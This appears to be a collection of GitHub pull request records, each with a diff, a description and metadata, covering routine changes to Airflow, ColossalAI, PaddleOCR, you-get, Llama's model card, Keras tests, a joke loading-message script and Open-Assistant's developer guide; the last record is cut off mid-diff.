diff --git a/airflow/providers/databricks/triggers/databricks.py b/airflow/providers/databricks/triggers/databricks.py index e5e56cc0ffa7d..2bd65a0d932b9 100644 --- a/airflow/providers/databricks/triggers/databricks.py +++ b/airflow/providers/databricks/triggers/databricks.py @@ -90,11 +90,11 @@ async def run(self): } ) return - else: - self.log.info( - "run-id %s in run state %s. sleeping for %s seconds", - self.run_id, - run_state, - self.polling_period_seconds, - ) - await asyncio.sleep(self.polling_period_seconds) + + self.log.info( + "run-id %s in run state %s. sleeping for %s seconds", + self.run_id, + run_state, + self.polling_period_seconds, + ) + await asyncio.sleep(self.polling_period_seconds)
https://api.github.com/repos/apache/airflow/pulls/38397
2024-03-22T04:33:44Z
2024-03-22T10:36:08Z
2024-03-22T10:36:08Z
2024-03-22T10:36:08Z
232
apache/airflow
14,215
[doc] add potential solution for OOM in llama2 example
diff --git a/examples/language/llama2/README.md b/examples/language/llama2/README.md index 483eae88ae32..16b263c1322e 100644 --- a/examples/language/llama2/README.md +++ b/examples/language/llama2/README.md @@ -149,6 +149,9 @@ Finally, run the following command to start training: ```bash bash gemini.sh ``` + +If you encounter out-of-memory(OOM) error during training with script `gemini.sh`, changing to script `gemini_auto.sh` might be a solution, since gemini_auto will set a upper limit on GPU memory usage through offloading part of the model parameters and optimizer states back to CPU memory. But there's a trade-off: `gemini_auto.sh` will be a bit slower, since more data are transmitted between CPU and GPU. + #### c. Results If you run the above command successfully, you will get the following results: `max memory usage: 55491.10 MB, throughput: 24.26 samples/s, TFLOPS/GPU: 167.43`.
## 📌 Checklist before creating the PR

- [ ] I have created an issue for this PR for traceability
- [x] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description`
- [x] I have added relevant tags if possible for us to better distinguish different PRs

## 🚨 Issue number

Many users have reported an OOM bug when running the llama example script, such as #4578

## 📝 What does this PR do?

Add an explanation of how to resolve the OOM error.

## 💥 Checklist before requesting a review

- [x] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue))
- [x] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible
- [x] I have performed a self-review of my code
- [x] I have added thorough tests.
- [x] I have added docstrings for all the functions/methods I implemented

## ⭐️ Do you enjoy contributing to Colossal-AI?

- [x] 🌝 Yes, I do.
- [ ] 🌚 No, I don't. Tell us more if you don't enjoy contributing to Colossal-AI.
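To picture the trade-off described in the README change above, here is a plain PyTorch offloading sketch (assumes a CUDA device); it only illustrates the general idea and is not how ColossalAI's Gemini plugin is implemented.

```python
import torch

layer = torch.nn.Linear(4096, 4096)   # parameters start out in CPU memory ("offloaded")
x = torch.randn(8, 4096, device="cuda")

layer.to("cuda")                       # pay a host-to-device transfer before the compute...
y = layer(x)
layer.to("cpu")                        # ...then push the parameters back out to free GPU memory
```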
https://api.github.com/repos/hpcaitech/ColossalAI/pulls/4699
2023-09-12T15:19:15Z
2023-09-13T02:43:30Z
2023-09-13T02:43:30Z
2023-09-13T06:22:45Z
247
hpcaitech/ColossalAI
11,300
update metric
diff --git a/doc/doc_ch/algorithm_overview.md b/doc/doc_ch/algorithm_overview.md index 0fd2f5b754..0db6c6f7ff 100755 --- a/doc/doc_ch/algorithm_overview.md +++ b/doc/doc_ch/algorithm_overview.md @@ -61,18 +61,18 @@ PaddleOCR基于动态图开源的文本识别算法列表: |模型|骨干网络|Avg Accuracy|模型存储命名|下载链接| |---|---|---|---|---| -|Rosetta|Resnet34_vd|80.9%|rec_r34_vd_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| -|Rosetta|MobileNetV3|78.05%|rec_mv3_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| -|CRNN|Resnet34_vd|82.76%|rec_r34_vd_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| -|CRNN|MobileNetV3|79.97%|rec_mv3_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| -|StarNet|Resnet34_vd|84.44%|rec_r34_vd_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| -|StarNet|MobileNetV3|81.42%|rec_mv3_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| -|RARE|MobileNetV3|82.5%|rec_mv3_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| -|RARE|Resnet34_vd|83.6%|rec_r34_vd_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| -|SRN|Resnet50_vd_fpn| 88.52% | rec_r50fpn_vd_none_srn | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar) | -|NRTR|NRTR_MTB| 84.3% | rec_mtb_nrtr | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | -|SAR|Resnet31| 87.2% | rec_r31_sar | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | -|SEED|Aster_Resnet| 85.2% | rec_resnet_stn_bilstm_att | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | +|Rosetta|Resnet34_vd|79.11%|rec_r34_vd_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| +|Rosetta|MobileNetV3|75.80%|rec_mv3_none_none_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| +|CRNN|Resnet34_vd|81.04%|rec_r34_vd_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| +|CRNN|MobileNetV3|77.95%|rec_mv3_none_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| +|StarNet|Resnet34_vd|82.85%|rec_r34_vd_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| +|StarNet|MobileNetV3|79.28%|rec_mv3_tps_bilstm_ctc|[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| +|RARE|Resnet34_vd|83.98%|rec_r34_vd_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| +|RARE|MobileNetV3|81.76%|rec_mv3_tps_bilstm_att |[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| +|SRN|Resnet50_vd_fpn| 86.31% | rec_r50fpn_vd_none_srn | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar) | +|NRTR|NRTR_MTB| 84.21% | rec_mtb_nrtr | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | +|SAR|Resnet31| 87.20% | rec_r31_sar | 
[训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | +|SEED|Aster_Resnet| 85.35% | rec_resnet_stn_bilstm_att | [训练模型](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | <a name="2"></a> diff --git a/doc/doc_en/algorithm_overview_en.md b/doc/doc_en/algorithm_overview_en.md index 8d27613ba8..3e94360653 100755 --- a/doc/doc_en/algorithm_overview_en.md +++ b/doc/doc_en/algorithm_overview_en.md @@ -67,20 +67,20 @@ Refer to [DTRB](https://arxiv.org/abs/1904.01906), the training and evaluation r |Model|Backbone|Avg Accuracy|Module combination|Download link| |---|---|---|---|---| -|Rosetta|Resnet34_vd|80.9%|rec_r34_vd_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| -|Rosetta|MobileNetV3|78.05%|rec_mv3_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| -|CRNN|Resnet34_vd|82.76%|rec_r34_vd_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| -|CRNN|MobileNetV3|79.97%|rec_mv3_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| -|StarNet|Resnet34_vd|84.44%|rec_r34_vd_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| -|StarNet|MobileNetV3|81.42%|rec_mv3_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| -|RARE|MobileNetV3|82.5%|rec_mv3_tps_bilstm_att |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| -|RARE|Resnet34_vd|83.6%|rec_r34_vd_tps_bilstm_att |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| -|SRN|Resnet50_vd_fpn| 88.52% | rec_r50fpn_vd_none_srn |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar)| -|NRTR|NRTR_MTB| 84.3% | rec_mtb_nrtr | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | -|SAR|Resnet31| 87.2% | rec_r31_sar | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | -|SEED|Aster_Resnet| 85.2% | rec_resnet_stn_bilstm_att | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | - -Please refer to the document for training guide and use of PaddleOCR +|Rosetta|Resnet34_vd|79.11%|rec_r34_vd_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_none_ctc_v2.0_train.tar)| +|Rosetta|MobileNetV3|75.80%|rec_mv3_none_none_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_none_ctc_v2.0_train.tar)| +|CRNN|Resnet34_vd|81.04%|rec_r34_vd_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_none_bilstm_ctc_v2.0_train.tar)| +|CRNN|MobileNetV3|77.95%|rec_mv3_none_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_none_bilstm_ctc_v2.0_train.tar)| +|StarNet|Resnet34_vd|82.85%|rec_r34_vd_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_ctc_v2.0_train.tar)| +|StarNet|MobileNetV3|79.28%|rec_mv3_tps_bilstm_ctc|[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_ctc_v2.0_train.tar)| +|RARE|Resnet34_vd|83.98%|rec_r34_vd_tps_bilstm_att |[trained 
model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r34_vd_tps_bilstm_att_v2.0_train.tar)| +|RARE|MobileNetV3|81.76%|rec_mv3_tps_bilstm_att |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mv3_tps_bilstm_att_v2.0_train.tar)| +|SRN|Resnet50_vd_fpn| 86.31% | rec_r50fpn_vd_none_srn |[trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_r50_vd_srn_train.tar)| +|NRTR|NRTR_MTB| 84.21% | rec_mtb_nrtr | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.0/en/rec_mtb_nrtr_train.tar) | +|SAR|Resnet31| 87.20% | rec_r31_sar | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_r31_sar_train.tar) | +|SEED|Aster_Resnet| 85.35% | rec_resnet_stn_bilstm_att | [trained model](https://paddleocr.bj.bcebos.com/dygraph_v2.1/rec/rec_resnet_stn_bilstm_att.tar) | + +Please refer to the document for training guide and use of PaddleOCR ## 2. Training
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/5276
2022-01-17T09:55:11Z
2022-01-17T10:40:23Z
2022-01-17T10:40:23Z
2022-01-17T10:40:24Z
3,343
PaddlePaddle/PaddleOCR
42,298
[ixigua] fix 'string indices must be integers'
diff --git a/src/you_get/extractors/ixigua.py b/src/you_get/extractors/ixigua.py index b368b380ab..f2fd953e69 100644 --- a/src/you_get/extractors/ixigua.py +++ b/src/you_get/extractors/ixigua.py @@ -95,6 +95,8 @@ def ixigua_download(url, output_dir='.', merge=True, info_only=False, stream_id= def convertStreams(video_list, audio_url): streams = [] + if type(video_list) == dict: + video_list = video_list.values() for dynamic_video in video_list: streams.append({ 'file_id': dynamic_video['file_hash'],
`you-get -i --debug "https://www.ixigua.com/7114608501724283407?app=video_article&timestamp=1663582546&utm_medium=android&utm_campaign=client_share&utm_source=wechat_friend&test_group=v1"` will traceback: ``` Traceback (most recent call last): File "d:\setup\you-get\you-get", line 11, in <module> you_get.main(repo_path=_filepath) File "D:\setup\you-get/src\you_get\__main__.py", line 92, in main main(**kwargs) File "D:\setup\you-get/src\you_get\common.py", line 1867, in main script_main(any_download, any_download_playlist, **kwargs) File "D:\setup\you-get/src\you_get\common.py", line 1759, in script_main download_main( File "D:\setup\you-get/src\you_get\common.py", line 1379, in download_main download(url, **kwargs) File "D:\setup\you-get/src\you_get\common.py", line 1858, in any_download m.download(url, **kwargs) File "D:\setup\you-get/src\you_get\extractors\ixigua.py", line 69, in ixigua_download streams = convertStreams(dynamic_video_list, "") File "D:\setup\you-get/src\you_get\extractors\ixigua.py", line 103, in convertStreams 'file_id': dynamic_video['file_hash'], TypeError: string indices must be integers ```
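A minimal reproduction sketch of the failure (hypothetical data): when the API returns the video list as a dict instead of a list, iterating it yields the keys (strings), and indexing a string with `'file_hash'` raises exactly the reported TypeError.

```python
video_list = {"360p": {"file_hash": "abc"}}

# Iterating a dict yields its keys (here the string "360p").
try:
    for dynamic_video in video_list:
        dynamic_video["file_hash"]
except TypeError as err:
    print(err)  # string indices must be integers

# The fix in this PR iterates over the values instead when a dict is received.
for dynamic_video in video_list.values():
    print(dynamic_video["file_hash"])  # abc
```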
https://api.github.com/repos/soimort/you-get/pulls/2980
2022-09-20T03:18:24Z
2022-10-08T22:08:04Z
2022-10-08T22:08:04Z
2022-10-08T22:08:10Z
160
soimort/you-get
20,936
[AIRFLOW-XXX] Fix docstrings of SQSHook
diff --git a/airflow/contrib/hooks/aws_sqs_hook.py b/airflow/contrib/hooks/aws_sqs_hook.py index 00ae231e564ab..3fc465d6811c2 100644 --- a/airflow/contrib/hooks/aws_sqs_hook.py +++ b/airflow/contrib/hooks/aws_sqs_hook.py @@ -23,6 +23,7 @@ class SQSHook(AwsHook): """ Get the SQS client using boto3 library + :return: SQS client :rtype: botocore.client.SQS """ @@ -30,42 +31,40 @@ class SQSHook(AwsHook): def get_conn(self): return self.get_client_type('sqs') - """ - Create queue using connection object - :param queue_name: name of the queue. - :type queue_name: str - :param attributes: additional attributes for the queue (default: None) - :type attributes: dict - - For details of the attributes parameter see :py:meth:`botocore.client.SQS.create_queue` + def create_queue(self, queue_name, attributes=None): + """ + Create queue using connection object - :return: dict with the information about the queue - :rtype: dict + :param queue_name: name of the queue. + :type queue_name: str + :param attributes: additional attributes for the queue (default: None) + For details of the attributes parameter see :py:meth:`botocore.client.SQS.create_queue` + :type attributes: dict - For details of the returned value see :py:meth:`botocore.client.SQS.create_queue` - """ - def create_queue(self, queue_name, attributes=None): + :return: dict with the information about the queue + For details of the returned value see :py:meth:`botocore.client.SQS.create_queue` + :rtype: dict + """ return self.get_conn().create_queue(QueueName=queue_name, Attributes=attributes or {}) - """ - Send message to the queue - :param queue_url: queue url - :type queue_url: str - :param message_body: the contents of the message - :type message_body: str - :param delay_seconds: seconds to delay the message - :type delay_seconds: int - :param message_attributes: additional attributes for the message (default: None) - :type message_attributes: dict - - For details of the attributes parameter see :py:meth:`botocore.client.SQS.send_message` + def send_message(self, queue_url, message_body, delay_seconds=0, message_attributes=None): + """ + Send message to the queue - :return: dict with the information about the message sent - :rtype: dict + :param queue_url: queue url + :type queue_url: str + :param message_body: the contents of the message + :type message_body: str + :param delay_seconds: seconds to delay the message + :type delay_seconds: int + :param message_attributes: additional attributes for the message (default: None) + For details of the attributes parameter see :py:meth:`botocore.client.SQS.send_message` + :type message_attributes: dict - For details of the returned value see :py:meth:`botocore.client.SQS.send_message` - """ - def send_message(self, queue_url, message_body, delay_seconds=0, message_attributes=None): + :return: dict with the information about the message sent + For details of the returned value see :py:meth:`botocore.client.SQS.send_message` + :rtype: dict + """ return self.get_conn().send_message(QueueUrl=queue_url, MessageBody=message_body, DelaySeconds=delay_seconds,
Make sure you have checked _all_ steps below. ### Jira - [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title. For example, "\[AIRFLOW-XXX\] My Airflow PR" - https://issues.apache.org/jira/browse/AIRFLOW-XXX ### Description - [x] Here are some details about my PR, including screenshots of any UI changes: https://github.com/apache/airflow/pull/4887 added hook but docstrings were in an incorrect position. ### Tests - [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason: ### Commits - [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)": 1. Subject is separated from body by a blank line 1. Subject is limited to 50 characters (not including Jira issue reference) 1. Subject does not end with a period 1. Subject uses the imperative mood ("add", not "adding") 1. Body wraps at 72 characters 1. Body explains "what" and "why", not "how" ### Documentation - [x] In case of new functionality, my PR adds documentation that describes how to use it. - All the public functions and the classes in the PR contain docstrings that explain what it does - If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to a appropriate release ### Code Quality - [x] Passes `flake8`
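A small sketch of the underlying Python rule this PR relies on: a string literal only becomes a function's docstring when it is the first statement inside the function body; placed above the `def`, as in the old code, it is attached to nothing.

```python
"""
This text is NOT attached to the function below.
"""
def create_queue_wrong():
    pass


def create_queue_right():
    """Create queue using connection object."""
    pass


assert create_queue_wrong.__doc__ is None
assert create_queue_right.__doc__ == "Create queue using connection object."
```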
https://api.github.com/repos/apache/airflow/pulls/5099
2019-04-15T00:27:16Z
2019-04-15T02:26:03Z
2019-04-15T02:26:03Z
2019-08-30T20:39:39Z
877
apache/airflow
14,379
Update MODEL_CARD.md
diff --git a/MODEL_CARD.md b/MODEL_CARD.md index 18d9dfea8..5b0128564 100644 --- a/MODEL_CARD.md +++ b/MODEL_CARD.md @@ -33,7 +33,9 @@ Llama 2|*A new mix of publicly available online data*|70B|4k|&#10004;|2.0T|1.5 x # **Intended Use** **Intended Use Cases** Llama 2 is intended for commercial and research use in English. Tuned models are intended for assistant-like chat, whereas pretrained models can be adapted for a variety of natural language generation tasks. -**Out-of-scope Uses** Use in any manner that violates applicable laws or regulations (including trade compliance laws). Use in languages other than English. Use in any other way that is prohibited by the Acceptable Use Policy and Licensing Agreement for Llama 2. +**Out-of-scope** Uses Use in any manner that violates applicable laws or regulations (including trade compliance laws). Use in any other way that is prohibited by the Acceptable Use Policy and Llama 2 Community License. Use in languages other than English**. + +**Note: Developers may fine-tune Llama 2 models for languages beyond English provided they comply with the Llama 2 Community License and the Acceptable Use Policy. # **Hardware and Software** **Training Factors** We used custom training libraries, Meta's Research Super Cluster, and production clusters for pretraining. Fine-tuning, annotation, and evaluation were also performed on third-party cloud compute.
Updated intended use cases to clarify that developers can fine-tune for non-English languages.
https://api.github.com/repos/meta-llama/llama/pulls/813
2023-09-20T22:18:46Z
2023-09-21T00:47:42Z
2023-09-21T00:47:42Z
2023-09-21T00:47:42Z
342
meta-llama/llama
31,988
Python script that chooses from 80 funny loading lines
diff --git a/randomloadingmessage.py b/randomloadingmessage.py new file mode 100644 index 0000000000..9ad93403bc --- /dev/null +++ b/randomloadingmessage.py @@ -0,0 +1,167 @@ +# Created by Nathan R (Mosrod) +# CREDIT TO https://github.com/1egoman/funnies/blob/master/src/funnies.js + +from random import * + +x = 1 + +for i in range(x): + num = randint(1, 80) + if num == 1: + print("Reticulating splines...") + if num == 2: + print("Swapping time and space...") + if num == 3: + print("Spinning violently around the y-axis...") + if num == 4: + print("Tokenizing real life...") + if num == 5: + print("Bending the spoon...") + if num == 6: + print("Filtering morale...") + if num == 7: + print("We need a new fuse...") + if num == 8: + print("Have a good day.") + if num == 9: + print("Upgrading Windows, your PC will restart several times. Sit back and relax.") + if num == 10: + print("The architects are still drafting.") + if num == 11: + print("We're building the buildings as fast as we can.") + if num == 12: + print("Please wait while the little elves draw your map.") + if num == 13: + print("Don't worry - a few bits tried to escape, but we caught them.") + if num == 14: + print("Go ahead -- hold your breath!") + if num == 15: + print("...at least you're not on hold...") + if num == 16: + print("The server is powered by a lemon and two electrodes.") + if num == 17: + print("We're testing your patience.") + if num == 18: + print("As if you had any other choice.") + if num == 19: + print("The bits are flowing slowly today.") + if num == 20: + print("It's still faster than you could draw it.") + if num == 21: + print("My other loading screen is much faster.") + if num == 22: + print("(Insert quarter)") + if num == 23: + print("Are we there yet?") + if num == 24: + print("Just count to 10.") + if num == 25: + print("Don't panic...") + if num == 26: + print("We're making you a cookie.") + if num == 27: + print("Creating time-loop inversion field.") + if num == 28: + print("Computing chance of success.") + if num == 29: + print("All I really need is a kilobit.") + if num == 30: + print("I feel like im supposed to be loading something...") + if num == 31: + print("Should have used a compiled language...") + if num == 32: + print("Is this Windows?") + if num == 33: + print("Don't break your screen yet!") + if num == 34: + print("I swear it's almost done.") + if num == 35: + print("Let's take a mindfulness minute...") + if num == 36: + print("Listening for the sound of one hand clapping...") + if num == 37: + print("Keeping all the 1's and removing all the 0's...") + if num == 38: + print("We are not liable for any broken screens as a result of waiting.") + if num == 39: + print("Where did all the internets go?") + if num == 40: + print("Granting wishes...") + if num == 41: + print("Time flies when you’re having fun.") + if num == 42: + print("Get some coffee and come back in ten minutes...") + if num == 43: + print("Stay awhile and listen...") + if num == 44: + print("Convincing AI not to turn evil...") + if num == 45: + print("How did you get here?") + if num == 46: + print("Wait, do you smell something burning?") + if num == 47: + print("Computing the secret to life, the universe, and everything.") + if num == 48: + print("When nothing is going right, go left...") + if num == 49: + print("I love my job only when I'm on vacation...") + if num == 50: + print("Why are they called apartments if they are all stuck together?") + if num == 51: + print("I’ve got problem for your solution...") + if num == 52: + 
print("Whenever I find the key to success, someone changes the lock.") + if num == 53: + print("Constructing additional pylons...") + if num == 54: + print("You don’t pay taxes—they take taxes.") + if num == 55: + print("A commit a day keeps the mobs away.") + if num == 56: + print("This is not a joke, it's a commit.") + if num == 57: + print("Hello IT, have you tried turning it off and on again?") + if num == 58: + print("Hello, IT... Have you tried forcing an unexpected reboot?") + if num == 59: + print("I didn't choose the engineering life. The engineering life chose me.") + if num == 60: + print("Dividing by zero...") + if num == 61: + print("If I’m not back in five minutes, just wait longer.") + if num == 62: + print("Web developers do it with <style>") + if num == 63: + print("Cracking military-grade encryption...") + if num == 64: + print("Entangling superstrings...") + if num == 65: + print("Looking for sense of humour, please hold on.") + if num == 66: + print("A different error message? Finally, some progress!") + if num == 67: + print("Please hold on as we reheat our coffee.") + if num == 68: + print("Kindly hold on as we convert this bug to a feature...") + if num == 69: + print("Kindly hold on as our intern quits vim...") + if num == 71: + print("Winter is coming...") + if num == 72: + print("Installing dependencies.") + if num == 73: + print("Switching to the latest JS framework...") + if num == 74: + print("Let's hope it's worth the wait.") + if num == 75: + print("Aw, snap! Not...") + if num == 76: + print("Ordering 1s and 0s...") + if num == 77: + print("Updating dependencies...") + if num == 78: + print("Please wait... Consulting the manual...") + if num == 79: + print("Loading funny message...") + if num == 80: + print("Feel free to spin in your chair.")
This is a great loading script for your program to brighten up your day!
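As an aside, the same behaviour (printing one of the lines at random) can be sketched more compactly with `random.choice`; this is only an illustration, not part of the PR.

```python
from random import choice

MESSAGES = [
    "Reticulating splines...",
    "Swapping time and space...",
    "Spinning violently around the y-axis...",
    # ...the remaining messages from the script above...
]

print(choice(MESSAGES))
```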
https://api.github.com/repos/geekcomputers/Python/pulls/393
2018-10-07T23:47:39Z
2018-10-08T18:25:17Z
2018-10-08T18:25:17Z
2018-10-08T18:25:22Z
1,715
geekcomputers/Python
31,430
New pull request -- much cleaner
diff --git a/tests/auto/keras/test_constraints.py b/tests/auto/keras/test_constraints.py new file mode 100644 index 00000000000..dbfba0f7396 --- /dev/null +++ b/tests/auto/keras/test_constraints.py @@ -0,0 +1,69 @@ +import unittest +import numpy as np +from numpy.testing import assert_allclose +from theano import tensor as T + + +class TestConstraints(unittest.TestCase): + def setUp(self): + self.some_values = [0.1, 0.5, 3, 8, 1e-7] + np.random.seed(3537) + self.example_array = np.random.random((100, 100)) * 100. - 50. + self.example_array[0, 0] = 0. # 0 could possibly cause trouble + + def test_maxnorm(self): + from keras.constraints import maxnorm + + for m in self.some_values: + norm_instance = maxnorm(m) + normed = norm_instance(self.example_array) + assert (np.all(normed.eval() < m)) + + # a more explicit example + norm_instance = maxnorm(2.0) + x = np.array([[0, 0, 0], [1.0, 0, 0], [3, 0, 0], [3, 3, 3]]).T + x_normed_target = np.array([[0, 0, 0], [1.0, 0, 0], [2.0, 0, 0], [2./np.sqrt(3), 2./np.sqrt(3), 2./np.sqrt(3)]]).T + x_normed_actual = norm_instance(x).eval() + assert_allclose(x_normed_actual, x_normed_target) + + def test_nonneg(self): + from keras.constraints import nonneg + + nonneg_instance = nonneg() + + normed = nonneg_instance(self.example_array) + assert (np.all(np.min(normed.eval(), axis=1) == 0.)) + + def test_identity(self): + from keras.constraints import identity + + identity_instance = identity() + + normed = identity_instance(self.example_array) + assert (np.all(normed == self.example_array)) + + def test_identity_oddballs(self): + """ + test the identity constraint on some more exotic input. + this does not need to pass for the desired real life behaviour, + but it should in the current implementation. + """ + from keras.constraints import identity + identity_instance = identity() + + oddball_examples = ["Hello", [1], -1, None] + assert(oddball_examples == identity_instance(oddball_examples)) + + def test_unitnorm(self): + from keras.constraints import unitnorm + unitnorm_instance = unitnorm() + + normalized = unitnorm_instance(self.example_array) + + norm_of_normalized = np.sqrt(np.sum(normalized.eval()**2, axis=1)) + difference = norm_of_normalized - 1. #in the unit norm constraint, it should be equal to 1. + largest_difference = np.max(np.abs(difference)) + self.assertAlmostEqual(largest_difference, 0.) + +if __name__ == '__main__': + unittest.main()
The weird file deletions are gone. Rebase done. Sorry about before :)
https://api.github.com/repos/keras-team/keras/pulls/327
2015-07-03T00:07:57Z
2015-07-03T00:48:27Z
2015-07-03T00:48:27Z
2015-07-03T05:12:37Z
760
keras-team/keras
47,449
Update the developers guide to the current state of the project
diff --git a/docs/docs/guides/developers.md b/docs/docs/guides/developers.md index 1617fad538..96690d09fb 100644 --- a/docs/docs/guides/developers.md +++ b/docs/docs/guides/developers.md @@ -89,16 +89,15 @@ can create their own custom assistants. ## The tools A web application, usually referred to as **"the web frontend"**, has been -created. Initially, it supports the first two steps of the process outlined in -the previous section, which require humans creating conversations (step 1) and -ranking answers (step 2). +created. It supports the first two steps of the process outlined in the previous +section, which require humans creating conversations (step 1) and ranking +answers (step 2). It also supports the inference step, creating a chat +interface. -For this same goal, data gathering, a discord bot is being created. We'll call -it **"the data gathering discord bot"**. +For data gathering, two discord bots were created, one using Python and the +other using Javascript. The latter also supports the inference process. -For doing the inference, once the final model is ready, an **"inference -service"** is being created. Another section will be added to the web frontend, -so that the assistant can be used from the web. +For doing the inference, an **"inference service"** has been created. In addition, for collecting the instruction dataset, a set of **scripts and notebooks** is being developed. @@ -134,10 +133,10 @@ When you run `npm run dev` in the website directory, it starts the Next.js application in the node server. The Next.js application is available at `http://localhost:3000`. -In the Dockerfile, there's also a `maildev` container that is used during to be -able to sent emails for registration, although for local development there are -fake users pre-created and this is not required. There is a fake user called -`dev` and it can be assigned a role during log in. +In the Dockerfile, there's also a `maildev` container that is used to be able to +sent emails for registration, although for local development there are fake +users pre-created and this is not required. There is a fake user called `dev` +and it can be assigned a role during log in. There are other scripts related to the frontend in the directory [scripts/frontend-development](https://github.com/LAION-AI/Open-Assistant/tree/main/scripts/frontend-development). @@ -146,16 +145,15 @@ Another included tool that can be interesting during development is [storybook](https://storybook.js.org/): it allows you to test UI components without having to run the whole application. -### The data gathering Discord bot +### The Discord bots -This is 